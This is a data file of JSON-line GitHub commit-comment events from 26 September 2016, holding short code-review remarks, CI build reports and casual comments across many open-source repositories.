{"id":"4618149531","type":"CommitCommentEvent","actor":{"login":"christian-steinmeyer"},"repo":{"name":"turion/haskell-asteroids"},"payload":{"comment":{"id":19173415,"position":null,"line":null,"path":null,"commit_id":"a927b30fcacdc19ac96469a35f1f65f4a9e731e9","created_at":"2016-09-26T14:30:19Z","updated_at":"2016-09-26T14:30:19Z","body":"https://gitter.im/turion/haskell-asteroids?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge"}},"created_at":"2016-09-26T14:30:19Z"}
{"id":"4618156221","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19173423,"position":1,"line":4,"path":"package.json","commit_id":"72bc94122a5f31ae765cabed26c0d404e3c8d6e8","created_at":"2016-09-26T14:31:19Z","updated_at":"2016-09-26T14:31:19Z","body":"Wat."}},"created_at":"2016-09-26T14:31:19Z"}
{"id":"4618157035","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173425,"position":21,"line":52,"path":"app/api/v01/helper/planning_icalendar.rb","commit_id":"e019af660cbca4104219f23178ae566de96ad25a","created_at":"2016-09-26T14:31:26Z","updated_at":"2016-09-26T14:31:26Z","body":"why moved and changed ?"}},"created_at":"2016-09-26T14:31:26Z"}
{"id":"4618160500","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"elmario89/internet-shop"},"payload":{"comment":{"id":19173436,"position":12,"line":13,"path":"static/javascript/router.js","commit_id":"9faa4d200cd93a97dddba7b4a8d2d019537ed45c","created_at":"2016-09-26T14:31:57Z","updated_at":"2016-09-26T14:31:57Z","body":"```.state('main.handbook', {``` и дальше пофиксить возможные ошибки"}},"created_at":"2016-09-26T14:31:57Z"}
{"id":"4618160896","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173438,"position":4,"line":39,"path":"app/api/v01/plannings_get.rb","commit_id":"e019af660cbca4104219f23178ae566de96ad25a","created_at":"2016-09-26T14:32:01Z","updated_at":"2016-09-26T14:32:01Z","body":"remove line"}},"created_at":"2016-09-26T14:32:01Z"}
{"id":"4618162490","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173441,"position":12,"line":42,"path":"app/api/v01/plannings_get.rb","commit_id":"e019af660cbca4104219f23178ae566de96ad25a","created_at":"2016-09-26T14:32:15Z","updated_at":"2016-09-26T14:32:15Z","body":"planning_ids ="}},"created_at":"2016-09-26T14:32:15Z"}
{"id":"4618165581","type":"CommitCommentEvent","actor":{"login":"klimov-paul"},"repo":{"name":"yiisoft/yii2-authclient"},"payload":{"comment":{"id":19173451,"position":4,"line":8,"path":"CHANGELOG.md","commit_id":"2b08ef174f5d194fd2cbb5e6b1a66383f1466905","created_at":"2016-09-26T14:32:43Z","updated_at":"2016-09-26T14:32:43Z","body":"8d58a5f97890619c5f89bff8411ef5429bd4b3b2"}},"created_at":"2016-09-26T14:32:43Z"}
{"id":"4618165760","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19173452,"position":null,"line":null,"path":null,"commit_id":"3e0522667448484a65559c91f00245763dd2a57c","created_at":"2016-09-26T14:32:45Z","updated_at":"2016-09-26T14:32:45Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-26T14:32:45Z"}
{"id":"4618166027","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173454,"position":15,"line":45,"path":"app/api/v01/plannings_get.rb","commit_id":"e019af660cbca4104219f23178ae566de96ad25a","created_at":"2016-09-26T14:32:47Z","updated_at":"2016-09-26T14:32:47Z","body":"use plannings from l#55"}},"created_at":"2016-09-26T14:32:47Z"}
{"id":"4618169422","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19173460,"position":1,"line":1,"path":"3454","commit_id":"77cc5cd74fc8766922abee74e114f2cafcbab0f2","created_at":"2016-09-26T14:33:19Z","updated_at":"2016-09-26T14:33:19Z","body":"dfasdfsdfs"}},"created_at":"2016-09-26T14:33:19Z"}
{"id":"4618169426","type":"CommitCommentEvent","actor":{"login":"fdesmottes"},"repo":{"name":"nuxly/odoo"},"payload":{"comment":{"id":19173459,"position":null,"line":null,"path":null,"commit_id":"db4917dd337d499c56d52bdf268781b727e79195","created_at":"2016-09-26T14:33:19Z","updated_at":"2016-09-26T14:33:19Z","body":"For information, this is a backport of Pull https://github.com/odoo/odoo/pull/12102 for OpenERP/Odoo 7.\r\nThe goal is to facilitate the setting of properties fields by offering a multi-company view."}},"created_at":"2016-09-26T14:33:19Z"}
{"id":"4618169998","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19173463,"position":7,"line":9,"path":"package.json","commit_id":"72bc94122a5f31ae765cabed26c0d404e3c8d6e8","created_at":"2016-09-26T14:33:24Z","updated_at":"2016-09-26T14:33:24Z","body":"You forgot to remove `vkapi`."}},"created_at":"2016-09-26T14:33:24Z"}
{"id":"4618175947","type":"CommitCommentEvent","actor":{"login":"Vayel"},"repo":{"name":"Vayel/GUCEM-BVC"},"payload":{"comment":{"id":19173471,"position":null,"line":null,"path":null,"commit_id":"2e7a07a946ba8190920c631d45e591da17392eaa","created_at":"2016-09-26T14:34:20Z","updated_at":"2016-09-26T14:34:20Z","body":"Je ne savais pas trop comment représenter ça. Là, on n'aurait qu'une seule ligne dans la table, non ?"}},"created_at":"2016-09-26T14:34:20Z"}
{"id":"4618177110","type":"CommitCommentEvent","actor":{"login":"hernandev"},"repo":{"name":"codecasts/codecasts"},"payload":{"comment":{"id":19173473,"position":16,"line":16,"path":"app/Domains/Podcasts/Listeners/IncrementsTimesDownloaded.php","commit_id":"5ecb9e6f2b692d2f47804b199c2c9c10cc8f0fcc","created_at":"2016-09-26T14:34:31Z","updated_at":"2016-09-26T14:34:31Z","body":"Indeed, that was done during a class, that method would be a realy nice refactoring, wanna send a pr?"}},"created_at":"2016-09-26T14:34:31Z"}
{"id":"4618177137","type":"CommitCommentEvent","actor":{"login":"my-ejima"},"repo":{"name":"my-ejima/hello_app2"},"payload":{"comment":{"id":19173474,"position":null,"line":null,"path":null,"commit_id":"9cb7dbc613a02be3b458623bafab990542cb9d7e","created_at":"2016-09-26T14:34:31Z","updated_at":"2016-09-26T14:34:31Z","body":"Rails version\t4.2.6\r\nRuby version\t2.2.4-p230 (x64-mingw32)\r\nRubyGems version\t2.6.4\r\nRack version\t1.6.4\r\nJavaScript Runtime\tNode.js (V8)\r\nApplication root\tC:/Users/my-ej/rails_app/hello_app2\r\nEnvironment\tdevelopment\r\nDatabase adapter\tsqlite3\r\n"}},"created_at":"2016-09-26T14:34:31Z"}
{"id":"4618178592","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19173476,"position":72,"line":72,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T14:34:45Z","updated_at":"2016-09-26T14:34:45Z","body":"d6 = six-sided die"}},"created_at":"2016-09-26T14:34:45Z"}
{"id":"4618185105","type":"CommitCommentEvent","actor":{"login":"dreyks"},"repo":{"name":"rails/sprockets-rails"},"payload":{"comment":{"id":19173493,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"10bc1bd096b39a3dd632571dd517788314657056","created_at":"2016-09-26T14:35:47Z","updated_at":"2016-09-26T14:35:47Z","body":"#380 "}},"created_at":"2016-09-26T14:35:47Z"}
{"id":"4618185511","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173495,"position":5,"line":789,"path":"app/assets/javascripts/plannings.js","commit_id":"e019af660cbca4104219f23178ae566de96ad25a","created_at":"2016-09-26T14:35:51Z","updated_at":"2016-09-26T14:35:51Z","body":"why rename ?"}},"created_at":"2016-09-26T14:35:51Z"}
{"id":"4618186044","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"elmario89/internet-shop"},"payload":{"comment":{"id":19173498,"position":9,"line":10,"path":"static/javascript/router.js","commit_id":"9faa4d200cd93a97dddba7b4a8d2d019537ed45c","created_at":"2016-09-26T14:35:56Z","updated_at":"2016-09-26T14:35:56Z","body":"добавь сюда\r\n```abstract: true,```"}},"created_at":"2016-09-26T14:35:56Z"}
{"id":"4618186981","type":"CommitCommentEvent","actor":{"login":"masoncodes"},"repo":{"name":"masoncodes/faire"},"payload":{"comment":{"id":19173503,"position":null,"line":null,"path":null,"commit_id":"9c351b83a0cf0bff1b1562ba4afd2f2ca6464fd9","created_at":"2016-09-26T14:36:06Z","updated_at":"2016-09-26T14:36:06Z","body":"bad bad bad"}},"created_at":"2016-09-26T14:36:06Z"}
{"id":"4618187310","type":"CommitCommentEvent","actor":{"login":"chenBoon"},"repo":{"name":"chenBoon/PopoverViewDemo"},"payload":{"comment":{"id":19173505,"position":3,"line":3,"path":"README.md","commit_id":"ea91c5f08ad560695da97eaa0f12decb1964de69","created_at":"2016-09-26T14:36:09Z","updated_at":"2016-09-26T14:36:09Z","body":"![2900f09f-edd3-4ff8-87f6-846248e03531](https://cloud.githubusercontent.com/assets/18484356/18838298/8d45f8b6-8439-11e6-9518-616f7558bbd0.png)\r\n"}},"created_at":"2016-09-26T14:36:09Z"}
{"id":"4618188859","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"elmario89/internet-shop"},"payload":{"comment":{"id":19173508,"position":12,"line":13,"path":"static/javascript/router.js","commit_id":"9faa4d200cd93a97dddba7b4a8d2d019537ed45c","created_at":"2016-09-26T14:36:22Z","updated_at":"2016-09-26T14:36:22Z","body":"и внутри этого темплейта добавь еще ```<div ui-view></div>```"}},"created_at":"2016-09-26T14:36:22Z"}
{"id":"4618189782","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19173510,"position":null,"line":null,"path":null,"commit_id":"56d90f42eda748c8e727851a96194250f1247b9e","created_at":"2016-09-26T14:36:31Z","updated_at":"2016-09-26T14:36:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1165](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14258&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:14:47"}},"created_at":"2016-09-26T14:36:31Z"}
{"id":"4618191291","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19173518,"position":16,"line":104,"path":"cura/BuildVolume.py","commit_id":"1cc5d699c4d735cacd4c9a22e11a40ce1c04b05a","created_at":"2016-09-26T14:36:45Z","updated_at":"2016-09-26T14:36:45Z","body":"activeStackChanged is called when switching machines, when switching the active stack and when the containers making up the stack change, but not when values are changed. It is in my opinion the more semantically correct signal to use."}},"created_at":"2016-09-26T14:36:45Z"}
{"id":"4618192395","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"elmario89/internet-shop"},"payload":{"comment":{"id":19173520,"position":10,"line":11,"path":"static/javascript/router.js","commit_id":"9faa4d200cd93a97dddba7b4a8d2d019537ed45c","created_at":"2016-09-26T14:36:57Z","updated_at":"2016-09-26T14:36:57Z","body":"и внутри этого темплейта добавь еще <div ui-view></div>"}},"created_at":"2016-09-26T14:36:57Z"}
{"id":"4618194699","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19173525,"position":null,"line":null,"path":null,"commit_id":"a8019a0543717d6ea3808302b7416a10122fe315","created_at":"2016-09-26T14:37:18Z","updated_at":"2016-09-26T14:37:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#akvxhYDJR225rsUdBodqfw"}},"created_at":"2016-09-26T14:37:18Z"}
{"id":"4618195797","type":"CommitCommentEvent","actor":{"login":"DarDar1"},"repo":{"name":"DarDar1/Dream-weaver"},"payload":{"comment":{"id":19173528,"position":null,"line":null,"path":null,"commit_id":"8ae4b4c5946e4b51023f0c4cecd79250c02ea1ed","created_at":"2016-09-26T14:37:29Z","updated_at":"2016-09-26T14:37:29Z","body":"It's me Dar-Dar 1 and once again 2 steps behind. I'm new at all of this ,but would love to learn . I want my computer to help me understand what my brain is trying to put on it."}},"created_at":"2016-09-26T14:37:29Z"}
{"id":"4618196000","type":"CommitCommentEvent","actor":{"login":"adamwathan"},"repo":{"name":"laravel/valet"},"payload":{"comment":{"id":19173530,"position":null,"line":null,"path":null,"commit_id":"8fc59dd74870db1a84375da8f128892ef55a575a","created_at":"2016-09-26T14:37:31Z","updated_at":"2016-09-26T14:37:31Z","body":"This has not been released in a tagged version yet, wait for 1.1.23."}},"created_at":"2016-09-26T14:37:31Z"}
{"id":"4618198388","type":"CommitCommentEvent","actor":{"login":"fashioncj"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19173534,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T14:37:53Z","updated_at":"2016-09-26T14:37:53Z","body":"Using getprop find :\r\nro.secure=1  \r\nro.adb.secure=1\r\n---\r\nit seems right"}},"created_at":"2016-09-26T14:37:53Z"}
{"id":"4618198960","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173537,"position":51,"line":1544,"path":"app/assets/javascripts/plannings.js","commit_id":"e019af660cbca4104219f23178ae566de96ad25a","created_at":"2016-09-26T14:37:58Z","updated_at":"2016-09-26T14:37:58Z","body":"rename get_planning_ids (or getPlanningIds)"}},"created_at":"2016-09-26T14:37:58Z"}
{"id":"4618199948","type":"CommitCommentEvent","actor":{"login":"cliteam"},"repo":{"name":"cliteam/CLI-BOT"},"payload":{"comment":{"id":19173539,"position":null,"line":null,"path":null,"commit_id":"525dd5cdd9c9148b5215d666195e334b8ff1252a","created_at":"2016-09-26T14:38:07Z","updated_at":"2016-09-26T14:38:07Z","body":"cliteam v2.0"}},"created_at":"2016-09-26T14:38:07Z"}
{"id":"4618210697","type":"CommitCommentEvent","actor":{"login":"sclark007"},"repo":{"name":"chef/inspec"},"payload":{"comment":{"id":19173563,"position":null,"line":null,"path":null,"commit_id":"6113bb82a86b6a4683d3001fcdde2049b1b4317b","created_at":"2016-09-26T14:39:44Z","updated_at":"2016-09-26T14:39:44Z","body":"👍 Congrats !! @chris-rock @arlimus "}},"created_at":"2016-09-26T14:39:44Z"}
{"id":"4618211349","type":"CommitCommentEvent","actor":{"login":"lindbergan"},"repo":{"name":"drualsk/RefugeeMap"},"payload":{"comment":{"id":19173565,"position":23,"line":76,"path":"app/src/main/java/dat255/refugeemap/GMapFragment.java","commit_id":"492df0c3963708831842fa5aaf2328f154a82602","created_at":"2016-09-26T14:39:50Z","updated_at":"2016-09-26T14:39:50Z","body":"Skojade bara, läste fel. Ignore this. "}},"created_at":"2016-09-26T14:39:50Z"}
{"id":"4618218443","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19173587,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-26T14:40:54Z","updated_at":"2016-09-26T14:40:54Z","body":"@subratpanda1 @xiaobuu @vyky I found that a module was still using the old API. The error went away after updating the module to use the new API."}},"created_at":"2016-09-26T14:40:54Z"}
{"id":"4618232567","type":"CommitCommentEvent","actor":{"login":"sashafierce"},"repo":{"name":"sashafierce/zulip-android"},"payload":{"comment":{"id":19173626,"position":null,"line":null,"path":null,"commit_id":"0be19ef7f3397b1dcb372d9fd45fa2fb769f6014","created_at":"2016-09-26T14:43:01Z","updated_at":"2016-09-26T14:43:01Z","body":"Update the build instructions in README to clarify the testing of Google Sign in."}},"created_at":"2016-09-26T14:43:01Z"}
{"id":"4618235391","type":"CommitCommentEvent","actor":{"login":"mortont"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19173637,"position":null,"line":null,"path":null,"commit_id":"243c9b8f382502c0dfcac5100c387a7a44491d1d","created_at":"2016-09-26T14:43:27Z","updated_at":"2016-09-26T14:43:27Z","body":"That's probably due to the model still needing work. The default parameters won't generate good audio; currently the best sounding audio we've synthesized was with significantly beefier hyperparameters than default.\r\n\r\n> do you think there is a way to give a seed clip, it will be able to generate a clip that sounds like the original seed clip, but with trained speaker voice model/feature?\r\n\r\nIn theory that could work, but the model is definitely not set up to do that."}},"created_at":"2016-09-26T14:43:27Z"}
{"id":"4618239005","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173651,"position":39,"line":60,"path":"app/api/v01/plannings_get.rb","commit_id":"e019af660cbca4104219f23178ae566de96ad25a","created_at":"2016-09-26T14:43:59Z","updated_at":"2016-09-26T14:43:59Z","body":"it should be possible to use ics format without 'ids' params"}},"created_at":"2016-09-26T14:43:59Z"}
{"id":"4618239336","type":"CommitCommentEvent","actor":{"login":"luk1337"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19173652,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T14:44:03Z","updated_at":"2016-09-26T14:44:03Z","body":"ok, I figured that out. Wait for 09/27"}},"created_at":"2016-09-26T14:44:03Z"}
{"id":"4618240872","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19173654,"position":null,"line":null,"path":null,"commit_id":"8ac5bc16184f3bc1a265517cc7d3d3f22737fdcf","created_at":"2016-09-26T14:44:16Z","updated_at":"2016-09-26T14:44:16Z","body":"真巧，今天在火车上我也写了一天，我也发现了这个API"}},"created_at":"2016-09-26T14:44:16Z"}
{"id":"4618242334","type":"CommitCommentEvent","actor":{"login":"bdevalia"},"repo":{"name":"patrickml/braintree"},"payload":{"comment":{"id":19173663,"position":null,"line":null,"path":null,"commit_id":"f2d13e516094167038a778264ae0c27363d4e1be","created_at":"2016-09-26T14:44:31Z","updated_at":"2016-09-26T14:44:31Z","body":"Greetings, Would your package not be supported after meteor version >=1.3 ? Are you discontinuing your support or something changed ?"}},"created_at":"2016-09-26T14:44:31Z"}
{"id":"4618245710","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19173673,"position":41,"line":229,"path":"src/java_bytecode/java_entry_point.cpp","commit_id":"5442f51e14a92c93b9a1282a687b3c432ee4144f","created_at":"2016-09-26T14:45:00Z","updated_at":"2016-09-26T14:45:00Z","body":"Simplified in https://github.com/smowton/cbmc/commit/f0d9fbf68c173f77636949c85939762d26343318"}},"created_at":"2016-09-26T14:45:00Z"}
{"id":"4618246265","type":"CommitCommentEvent","actor":{"login":"VeselinovStf"},"repo":{"name":"VeselinovStf/Advanced-Bootstrap"},"payload":{"comment":{"id":19173675,"position":null,"line":null,"path":null,"commit_id":"8a815af5efd3ca74bf9ac6df6e60b432fce16b3a","created_at":"2016-09-26T14:45:05Z","updated_at":"2016-09-26T14:45:05Z","body":"GET THIS THINGS BACK!!!"}},"created_at":"2016-09-26T14:45:05Z"}
{"id":"4618246926","type":"CommitCommentEvent","actor":{"login":"VeselinovStf"},"repo":{"name":"VeselinovStf/Advanced-Bootstrap"},"payload":{"comment":{"id":19173676,"position":44,"line":27,"path":"README.md","commit_id":"8a815af5efd3ca74bf9ac6df6e60b432fce16b3a","created_at":"2016-09-26T14:45:11Z","updated_at":"2016-09-26T14:45:11Z","body":"Getting Back!"}},"created_at":"2016-09-26T14:45:11Z"}
{"id":"4618248082","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19173678,"position":15,"line":15,"path":"src/util/compare_irep_comments.cpp","commit_id":"5442f51e14a92c93b9a1282a687b3c432ee4144f","created_at":"2016-09-26T14:45:21Z","updated_at":"2016-09-26T14:45:21Z","body":"Turns out there's already `irept::full_eq`, so just used that (also in https://github.com/smowton/cbmc/commit/f0d9fbf68c173f77636949c85939762d26343318)"}},"created_at":"2016-09-26T14:45:21Z"}
{"id":"4618248718","type":"CommitCommentEvent","actor":{"login":"funjoker"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19173679,"position":null,"line":null,"path":null,"commit_id":"d4887311e39527e036419ebd966f399fdbdae67a","created_at":"2016-09-26T14:45:26Z","updated_at":"2016-09-26T14:45:26Z","body":"src/server/scripts/World/scene_scripts.cpp\r\n\r\nLine 26.\r\n"}},"created_at":"2016-09-26T14:45:26Z"}
{"id":"4618262953","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19173707,"position":null,"line":null,"path":null,"commit_id":"69edb3931816fdb1c12ffe0f16918e5bacd27d26","created_at":"2016-09-26T14:47:29Z","updated_at":"2016-09-26T14:47:29Z","body":":)"}},"created_at":"2016-09-26T14:47:29Z"}
{"id":"4618266746","type":"CommitCommentEvent","actor":{"login":"jwpeterson"},"repo":{"name":"libMesh/libmesh"},"payload":{"comment":{"id":19173718,"position":null,"line":null,"path":null,"commit_id":"cd48a51370d4491d7d4cea1826e87d9b8acb1023","created_at":"2016-09-26T14:48:05Z","updated_at":"2016-09-26T14:48:05Z","body":"Don't forget examples and unit tests directories.  \r\n```\r\nexamples/miscellaneous/miscellaneous_ex9/augment_sparsity_on_interface.C:112: tab in indent.\r\n+       // For pairs with local elements, we should have found a\r\nexamples/miscellaneous/miscellaneous_ex9/augment_sparsity_on_interface.C:113: tab in indent.\r\n+       // matching pair by now.\r\nexamples/miscellaneous/miscellaneous_ex9/augment_sparsity_on_interface.C:124: tab in indent.\r\n+           // This must have a false positive; a remote element would\r\nexamples/miscellaneous/miscellaneous_ex9/augment_sparsity_on_interface.C:125: tab in indent.\r\n+           // have been closer.\r\nexamples/miscellaneous/miscellaneous_ex9/augment_sparsity_on_interface.C:126: tab in indent.\r\n+           _lower_to_upper.erase(it->first);\r\ntests/base/default_coupling_test.C:36: trailing whitespace.\r\n+  \r\n```\r\n\r\nIf you just run the git command I sent you, it will show if you've missed any...\r\n"}},"created_at":"2016-09-26T14:48:05Z"}
{"id":"4618271517","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173732,"position":20,"line":67,"path":"app/views/plannings/index.html.erb","commit_id":"e019af660cbca4104219f23178ae566de96ad25a","created_at":"2016-09-26T14:48:50Z","updated_at":"2016-09-26T14:48:50Z","body":"'email' param not needed here ?"}},"created_at":"2016-09-26T14:48:50Z"}
{"id":"4618273894","type":"CommitCommentEvent","actor":{"login":"sumoist"},"repo":{"name":"sumoist/basic_course"},"payload":{"comment":{"id":19173736,"position":null,"line":null,"path":null,"commit_id":"674b917626d98b66e7d1883653d66f7d3993c54d","created_at":"2016-09-26T14:49:12Z","updated_at":"2016-09-26T14:49:12Z","body":"Ок, переименовал."}},"created_at":"2016-09-26T14:49:12Z"}
{"id":"4618280119","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19173751,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-26T14:50:09Z","updated_at":"2016-09-26T14:50:09Z","body":"I think this is a really cool idea, but needs a good bit more work to maintain type safety.  I think there would need to be a matcher for every Arity of OneOfs, and rather than using typeof, you'd need to use an \"is\" clause to make the logic obey OO hierarchies.  I think that's the real reason for indexes in the original, and in light of that, I'm hesitant to go along with the removal of the index idea.\r\n\r\nPersonally, I'm going to branch off of you from before the removal of the index and forge my own path as well :)"}},"created_at":"2016-09-26T14:50:09Z"}
{"id":"4618301184","type":"CommitCommentEvent","actor":{"login":"arr2036"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":19173782,"position":null,"line":null,"path":null,"commit_id":"461cfc3bafd36525eec95ea0abb6119205a59382","created_at":"2016-09-26T14:53:18Z","updated_at":"2016-09-26T14:53:18Z","body":"Hmm, that mapping behaviour is fairly horrific... and confirmed...\r\n\r\n```\r\nIgnoring request to radius_auth address :: port 1812 bound to server default from unknown client ::ffff:127.0.0.1 port 62054 proto udp\r\nReady to process requests\r\n```\r\n\r\nCould we please leave the default as in6addr_any.  The point to the defaults is to specify a sensible configuration that works and follows roughly best practices."}},"created_at":"2016-09-26T14:53:18Z"}
{"id":"4618303831","type":"CommitCommentEvent","actor":{"login":"wikimatze"},"repo":{"name":"wikimatze/vimfiles"},"payload":{"comment":{"id":19173790,"position":null,"line":null,"path":null,"commit_id":"a3bfbd91d2e0ff698f892774ff3b5024135de01c","created_at":"2016-09-26T14:53:42Z","updated_at":"2016-09-26T14:53:42Z","body":"Reddit ist auch eine gute Idee."}},"created_at":"2016-09-26T14:53:42Z"}
{"id":"4618304329","type":"CommitCommentEvent","actor":{"login":"yzj19870824"},"repo":{"name":"yzj19870824/371.cSumTwoINt"},"payload":{"comment":{"id":19173792,"position":null,"line":null,"path":null,"commit_id":"49b089f9778339d6de102fa67800f43656494fda","created_at":"2016-09-26T14:53:46Z","updated_at":"2016-09-26T14:53:46Z","body":"你说的就是这个道理"}},"created_at":"2016-09-26T14:53:46Z"}
{"id":"4618305252","type":"CommitCommentEvent","actor":{"login":"slytomcat"},"repo":{"name":"karlicoss/yandex-disk-indicator"},"payload":{"comment":{"id":19173794,"position":null,"line":null,"path":null,"commit_id":"e0a877375daf9446572f4c05e085b41abc8dad92","created_at":"2016-09-26T14:53:55Z","updated_at":"2016-09-26T14:53:55Z","body":"It will not work. \r\nDaemon configuration is stored on exit from the preference dialog. When you restart daemon within the opened preferences dialog it restarts daemon with unmodified daemon configuration file.\r\n\r\nIf You want to applay config changes via daemon restart You have to store daemon configuration first. See the store procedure in rows 1146 - 1148 (at original master)."}},"created_at":"2016-09-26T14:53:55Z"}
{"id":"4618305892","type":"CommitCommentEvent","actor":{"login":"akoeplinger"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19173797,"position":3,"line":2,"path":"mcs/class/referencesource/System/services/monitoring/system/diagnosticts/ProcessThreadCollection.cs","commit_id":"8e4a52a37499af9383dfdec5a67c81775d260899","created_at":"2016-09-26T14:54:02Z","updated_at":"2016-09-26T14:54:02Z","body":"inadvertent change?"}},"created_at":"2016-09-26T14:54:02Z"}
{"id":"4618307274","type":"CommitCommentEvent","actor":{"login":"yzj19870824"},"repo":{"name":"yzj19870824/371.cSumTwoINt"},"payload":{"comment":{"id":19173802,"position":13,"line":15,"path":"remark.txt","commit_id":"49b089f9778339d6de102fa67800f43656494fda","created_at":"2016-09-26T14:54:14Z","updated_at":"2016-09-26T14:54:14Z","body":"test"}},"created_at":"2016-09-26T14:54:14Z"}
{"id":"4618307474","type":"CommitCommentEvent","actor":{"login":"troyfontaine"},"repo":{"name":"troyfontaine/fleet_rolling_restart"},"payload":{"comment":{"id":19173803,"position":null,"line":null,"path":null,"commit_id":"48ec65e112c9d49a26a913a57e1a696c32b2df4d","created_at":"2016-09-26T14:54:15Z","updated_at":"2016-09-26T14:54:15Z","body":"Fixes #3 "}},"created_at":"2016-09-26T14:54:15Z"}
{"id":"4618307778","type":"CommitCommentEvent","actor":{"login":"BadiBasso"},"repo":{"name":"swisszeni/PoGo-UWP"},"payload":{"comment":{"id":19173804,"position":55,"line":450,"path":"PokemonGo-UWP/ViewModels/PokemonDetailPageViewModel.cs","commit_id":"28fc486bfe49aa57fbaed3d9900d3d48a4855de1","created_at":"2016-09-26T14:54:18Z","updated_at":"2016-09-26T14:54:18Z","body":"Small typo here perhaps? I mean Pokemons are not farmers, are they ;)"}},"created_at":"2016-09-26T14:54:18Z"}
